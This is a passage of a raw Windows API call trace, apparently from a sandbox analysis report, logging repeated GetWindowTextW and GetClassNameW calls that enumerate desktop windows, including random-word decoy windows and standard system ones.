nMaxCount=1024 | out: lpString="Weapon Natural") returned 14 [0121.561] GetClassNameW (in: hWnd=0x10260, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="weapon_Natural_win") returned 18 [0121.562] GetWindowTextW (in: hWnd=0x10266, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Camera") returned 6 [0121.562] GetClassNameW (in: hWnd=0x10266, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Camerawindow") returned 12 [0121.562] GetWindowTextW (in: hWnd=0x10262, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Nothing Foreign") returned 15 [0121.562] GetClassNameW (in: hWnd=0x10262, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="nothing_Foreign_app") returned 19 [0121.562] GetWindowTextW (in: hWnd=0x10264, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Move") returned 4 [0121.562] GetClassNameW (in: hWnd=0x10264, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="movecls") returned 7 [0121.562] GetWindowTextW (in: hWnd=0x40200, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Arrive") returned 6 [0121.563] GetClassNameW (in: hWnd=0x40200, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="arrivewnd") returned 9 [0121.563] GetWindowTextW (in: hWnd=0x1025c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Throw Toward Purpose") returned 20 [0121.563] GetClassNameW (in: hWnd=0x1025c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="throwTowardPurposeclass") returned 23 [0121.563] GetWindowTextW (in: hWnd=0x10244, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Factor Western Forget") returned 21 [0121.563] GetClassNameW (in: hWnd=0x10244, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="factor_Western_forget_window") returned 28 [0121.563] GetWindowTextW (in: hWnd=0x1022e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Clear") returned 5 [0121.564] GetClassNameW (in: hWnd=0x1022e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Clear_app") returned 9 [0121.564] GetWindowTextW (in: hWnd=0x10222, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Watch") returned 5 [0121.564] GetClassNameW (in: hWnd=0x10222, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Watch") returned 5 [0121.564] GetWindowTextW (in: hWnd=0x10230, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Who South") returned 9 [0121.564] GetClassNameW (in: hWnd=0x10230, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="whosouthapp") returned 11 [0121.564] GetWindowTextW (in: hWnd=0x10226, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Raise Left Buy") returned 14 [0121.565] GetClassNameW (in: hWnd=0x10226, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="raiseLeftbuyclass") returned 17 [0121.565] GetWindowTextW (in: hWnd=0x10218, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Knowledge Sign") returned 14 [0121.565] GetClassNameW (in: hWnd=0x10218, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Knowledgesignwin") returned 16 [0121.565] GetWindowTextW (in: hWnd=0x1020e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Drop") returned 4 [0121.565] GetClassNameW (in: hWnd=0x1020e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Dropwindow") returned 10 [0121.565] GetWindowTextW (in: hWnd=0x1020c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="That But") returned 8 [0121.566] GetClassNameW (in: hWnd=0x1020c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="that_but_class") returned 14 [0121.566] GetWindowTextW (in: hWnd=0x10206, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Claim") returned 5 [0121.566] GetClassNameW (in: hWnd=0x10206, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="claim_wnd") returned 9 [0121.566] GetWindowTextW (in: hWnd=0x10204, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Quite Do") returned 8 [0121.566] GetClassNameW (in: hWnd=0x10204, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Quite_Do_class") returned 14 [0121.566] GetWindowTextW (in: hWnd=0x30122, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.567] GetClassNameW (in: hWnd=0x30122, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.567] GetWindowTextW (in: hWnd=0x30036, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.567] GetClassNameW (in: hWnd=0x30036, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.567] GetWindowTextW (in: hWnd=0x3003e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.568] GetClassNameW (in: hWnd=0x3003e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.568] GetWindowTextW (in: hWnd=0x30070, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.568] GetClassNameW (in: hWnd=0x30070, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.568] GetWindowTextW (in: hWnd=0x201e0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0121.568] GetClassNameW (in: hWnd=0x201e0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0121.569] GetWindowTextW (in: hWnd=0x401f2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.569] GetClassNameW (in: hWnd=0x401f2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.569] GetWindowTextW (in: hWnd=0x30288, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.569] GetClassNameW (in: hWnd=0x30288, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.570] GetWindowTextW (in: hWnd=0x30126, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0121.570] GetClassNameW (in: hWnd=0x30126, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IEFrame") returned 7 [0121.570] GetWindowTextW (in: hWnd=0x2012c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.570] GetClassNameW (in: hWnd=0x2012c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0121.571] GetWindowTextW (in: hWnd=0x20084, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.571] GetClassNameW (in: hWnd=0x20084, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0121.571] GetWindowTextW (in: hWnd=0x301fe, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.571] GetClassNameW (in: hWnd=0x301fe, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.571] GetWindowTextW (in: hWnd=0x201fa, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.571] GetClassNameW (in: hWnd=0x201fa, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.572] GetWindowTextW (in: hWnd=0x101be, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.572] GetClassNameW (in: hWnd=0x101be, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ATL:00007FFB1C177080") returned 20 [0121.572] GetWindowTextW (in: hWnd=0x101b8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.572] GetClassNameW (in: hWnd=0x101b8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.572] GetWindowTextW (in: hWnd=0x101aa, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Battery Meter") returned 13 [0121.572] GetClassNameW (in: hWnd=0x101aa, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="SystemTray_Main") returned 15 [0121.573] GetWindowTextW (in: hWnd=0x101a6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.573] GetClassNameW (in: hWnd=0x101a6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.573] GetWindowTextW (in: hWnd=0x101a4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0121.573] GetClassNameW (in: hWnd=0x101a4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0121.573] GetWindowTextW (in: hWnd=0x1018e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Task Host Window") returned 16 [0121.573] GetClassNameW (in: hWnd=0x1018e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0121.583] GetWindowTextW (in: hWnd=0x10110, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.583] GetClassNameW (in: hWnd=0x10110, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.583] GetWindowTextW (in: hWnd=0x10118, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.583] GetClassNameW (in: hWnd=0x10118, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="TabletModeCoverWindow") returned 21 [0121.583] GetWindowTextW (in: hWnd=0x20152, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.583] GetClassNameW (in: hWnd=0x20152, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.583] GetWindowTextW (in: hWnd=0x1019a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.584] GetClassNameW (in: hWnd=0x1019a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.584] GetWindowTextW (in: hWnd=0x10116, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.584] GetClassNameW (in: hWnd=0x10116, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0121.584] GetWindowTextW (in: hWnd=0x1010e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.584] GetClassNameW (in: hWnd=0x1010e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0121.584] GetWindowTextW (in: hWnd=0x100f4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.585] GetClassNameW (in: hWnd=0x100f4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.585] GetWindowTextW (in: hWnd=0x100f0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Windows Push Notifications Platform") returned 35 [0121.585] GetClassNameW (in: hWnd=0x100f0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0121.585] GetWindowTextW (in: hWnd=0x100ee, lpString=0x7deed0, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0121.585] GetClassNameW (in: hWnd=0x100ee, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0121.586] GetWindowTextW (in: hWnd=0x100ea, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.586] GetClassNameW (in: hWnd=0x100ea, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0121.586] GetWindowTextW (in: hWnd=0x100e6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.586] GetClassNameW (in: hWnd=0x100e6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.586] GetWindowTextW (in: hWnd=0x100e4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.586] GetClassNameW (in: hWnd=0x100e4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.587] GetWindowTextW (in: hWnd=0x200da, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.587] GetClassNameW (in: hWnd=0x200da, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.587] GetWindowTextW (in: hWnd=0x100c0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.587] GetClassNameW (in: hWnd=0x100c0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.587] GetWindowTextW (in: hWnd=0x702b8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.588] GetClassNameW (in: hWnd=0x702b8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0121.588] GetWindowTextW (in: hWnd=0x20040, lpString=0x7deed0, nMaxCount=1024 | out: lpString="MS_WebcheckMonitor") returned 18 [0121.588] GetClassNameW (in: hWnd=0x20040, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0121.588] GetWindowTextW (in: hWnd=0x2001c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="BluetoothNotificationAreaIconWindowClass") returned 40 [0121.588] GetClassNameW (in: hWnd=0x2001c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0121.588] GetWindowTextW (in: hWnd=0x20030, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Windows Shell Experience Host") returned 29 [0121.588] GetClassNameW (in: hWnd=0x20030, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0121.589] GetWindowTextW (in: hWnd=0x2002e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.589] GetClassNameW (in: hWnd=0x2002e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="PNIHiddenWnd") returned 12 [0121.589] GetWindowTextW (in: hWnd=0x40038, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.589] GetClassNameW (in: hWnd=0x40038, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.590] GetWindowTextW (in: hWnd=0x101cc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.590] GetClassNameW (in: hWnd=0x101cc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.590] GetWindowTextW (in: hWnd=0x101c8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.590] GetClassNameW (in: hWnd=0x101c8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0121.590] GetWindowTextW (in: hWnd=0x100ac, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.591] GetClassNameW (in: hWnd=0x100ac, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0121.591] GetWindowTextW (in: hWnd=0x10078, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.591] GetClassNameW (in: hWnd=0x10078, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0121.591] GetWindowTextW (in: hWnd=0x10074, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.591] GetClassNameW (in: hWnd=0x10074, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0121.591] GetWindowTextW (in: hWnd=0x10022, lpString=0x7deed0, nMaxCount=1024 | out: lpString="DWM Notification Window") returned 23 [0121.591] GetClassNameW (in: hWnd=0x10022, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Dwm") returned 3 [0121.592] GetWindowTextW (in: hWnd=0x2002a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.592] GetClassNameW (in: hWnd=0x2002a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="CicLoaderWndClass") returned 17 [0121.592] GetWindowTextW (in: hWnd=0x3035e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.592] GetClassNameW (in: hWnd=0x3035e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0121.593] GetWindowTextW (in: hWnd=0x100d0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Program Manager") returned 15 [0121.593] GetClassNameW (in: hWnd=0x100d0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Progman") returned 7 [0121.593] GetWindowTextW (in: hWnd=0x1012a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.593] GetClassNameW (in: hWnd=0x1012a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.593] GetWindowTextW (in: hWnd=0x100ce, lpString=0x7deed0, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0121.593] GetClassNameW (in: hWnd=0x100ce, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0121.593] GetWindowTextW (in: hWnd=0x10082, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.594] GetClassNameW (in: hWnd=0x10082, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.594] GetWindowTextW (in: hWnd=0xb031c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.594] GetClassNameW (in: hWnd=0xb031c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.594] GetWindowTextW (in: hWnd=0x601d6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.594] GetClassNameW (in: hWnd=0x601d6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.595] GetWindowTextW (in: hWnd=0x103a0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.595] GetClassNameW (in: hWnd=0x103a0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.595] GetWindowTextW (in: hWnd=0x1039e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.595] GetClassNameW (in: hWnd=0x1039e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.595] GetWindowTextW (in: hWnd=0x1039c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.596] GetClassNameW (in: hWnd=0x1039c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.596] GetWindowTextW (in: hWnd=0x1039a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.596] GetClassNameW (in: hWnd=0x1039a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.596] GetWindowTextW (in: hWnd=0x20224, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.596] GetClassNameW (in: hWnd=0x20224, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.597] GetWindowTextW (in: hWnd=0x10398, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.597] GetClassNameW (in: hWnd=0x10398, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.597] GetWindowTextW (in: hWnd=0x10394, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.597] GetClassNameW (in: hWnd=0x10394, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.597] GetWindowTextW (in: hWnd=0x10392, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.598] GetClassNameW (in: hWnd=0x10392, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.598] GetWindowTextW (in: hWnd=0x10390, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.598] GetClassNameW (in: hWnd=0x10390, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.598] GetWindowTextW (in: hWnd=0x10388, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.598] GetClassNameW (in: hWnd=0x10388, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.598] GetWindowTextW (in: hWnd=0x10386, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.599] GetClassNameW (in: hWnd=0x10386, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.599] GetWindowTextW (in: hWnd=0x10384, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.599] GetClassNameW (in: hWnd=0x10384, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.599] GetWindowTextW (in: hWnd=0x10382, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.599] GetClassNameW (in: hWnd=0x10382, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.599] GetWindowTextW (in: hWnd=0x2021a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.600] GetClassNameW (in: hWnd=0x2021a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.600] GetWindowTextW (in: hWnd=0x10380, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.600] GetClassNameW (in: hWnd=0x10380, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.600] GetWindowTextW (in: hWnd=0x1037e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.600] GetClassNameW (in: hWnd=0x1037e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.600] GetWindowTextW (in: hWnd=0x1037c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.600] GetClassNameW (in: hWnd=0x1037c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.600] GetWindowTextW (in: hWnd=0x1037a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.601] GetClassNameW (in: hWnd=0x1037a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.601] GetWindowTextW (in: hWnd=0x10378, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.601] GetClassNameW (in: hWnd=0x10378, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.601] GetWindowTextW (in: hWnd=0x10376, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.601] GetClassNameW (in: hWnd=0x10376, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.601] GetWindowTextW (in: hWnd=0x10374, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.602] GetClassNameW (in: hWnd=0x10374, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.602] GetWindowTextW (in: hWnd=0x10372, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.602] GetClassNameW (in: hWnd=0x10372, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.602] GetWindowTextW (in: hWnd=0x10370, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.602] GetClassNameW (in: hWnd=0x10370, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.602] GetWindowTextW (in: hWnd=0x1036e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.602] GetClassNameW (in: hWnd=0x1036e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.603] GetWindowTextW (in: hWnd=0x1036c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.603] GetClassNameW (in: hWnd=0x1036c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.603] GetWindowTextW (in: hWnd=0x10368, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.603] GetClassNameW (in: hWnd=0x10368, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.603] GetWindowTextW (in: hWnd=0x10362, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.603] GetClassNameW (in: hWnd=0x10362, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.604] GetWindowTextW (in: hWnd=0x10360, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.604] GetClassNameW (in: hWnd=0x10360, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.604] GetWindowTextW (in: hWnd=0x1035a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.604] GetClassNameW (in: hWnd=0x1035a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.604] GetWindowTextW (in: hWnd=0x10358, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.604] GetClassNameW (in: hWnd=0x10358, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.605] GetWindowTextW (in: hWnd=0x10356, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.605] GetClassNameW (in: hWnd=0x10356, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.605] GetWindowTextW (in: hWnd=0x10354, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.605] GetClassNameW (in: hWnd=0x10354, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.605] GetWindowTextW (in: hWnd=0x10352, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.605] GetClassNameW (in: hWnd=0x10352, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.606] GetWindowTextW (in: hWnd=0x10350, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.606] GetClassNameW (in: hWnd=0x10350, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.606] GetWindowTextW (in: hWnd=0x1034e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.606] GetClassNameW (in: hWnd=0x1034e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.606] GetWindowTextW (in: hWnd=0x1034c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.606] GetClassNameW (in: hWnd=0x1034c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.607] GetWindowTextW (in: hWnd=0x1034a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.607] GetClassNameW (in: hWnd=0x1034a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.607] GetWindowTextW (in: hWnd=0x10348, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.607] GetClassNameW (in: hWnd=0x10348, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.608] GetWindowTextW (in: hWnd=0x10346, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.608] GetClassNameW (in: hWnd=0x10346, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.608] GetWindowTextW (in: hWnd=0x20216, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.608] GetClassNameW (in: hWnd=0x20216, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.608] GetWindowTextW (in: hWnd=0x1033c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.608] GetClassNameW (in: hWnd=0x1033c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.608] GetWindowTextW (in: hWnd=0x10334, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.609] GetClassNameW (in: hWnd=0x10334, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.609] GetWindowTextW (in: hWnd=0x10326, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.609] GetClassNameW (in: hWnd=0x10326, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.609] GetWindowTextW (in: hWnd=0x1030e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 